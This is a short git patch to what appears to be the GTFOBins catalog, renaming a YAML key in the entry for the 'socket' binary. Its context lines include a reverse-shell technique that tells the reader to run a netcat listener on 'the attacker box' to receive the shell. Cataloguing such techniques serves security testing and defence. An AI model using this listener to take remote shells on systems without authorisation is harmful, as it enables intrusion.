From aebe711cf06fee15bf09d0c7a8948dba065bdee8 Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Fri, 23 Dec 2022 20:06:15 +0100 Subject: [PATCH] Fix socket --- _gtfobins/socket.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/_gtfobins/socket.md b/_gtfobins/socket.md index 76e1f72..1e86a8e 100644 --- a/_gtfobins/socket.md +++ b/_gtfobins/socket.md @@ -1,5 +1,5 @@ --- -function: +functions: reverse-shell: - description: Run `nc -l -p 12345` on the attacker box to receive the shell. code: |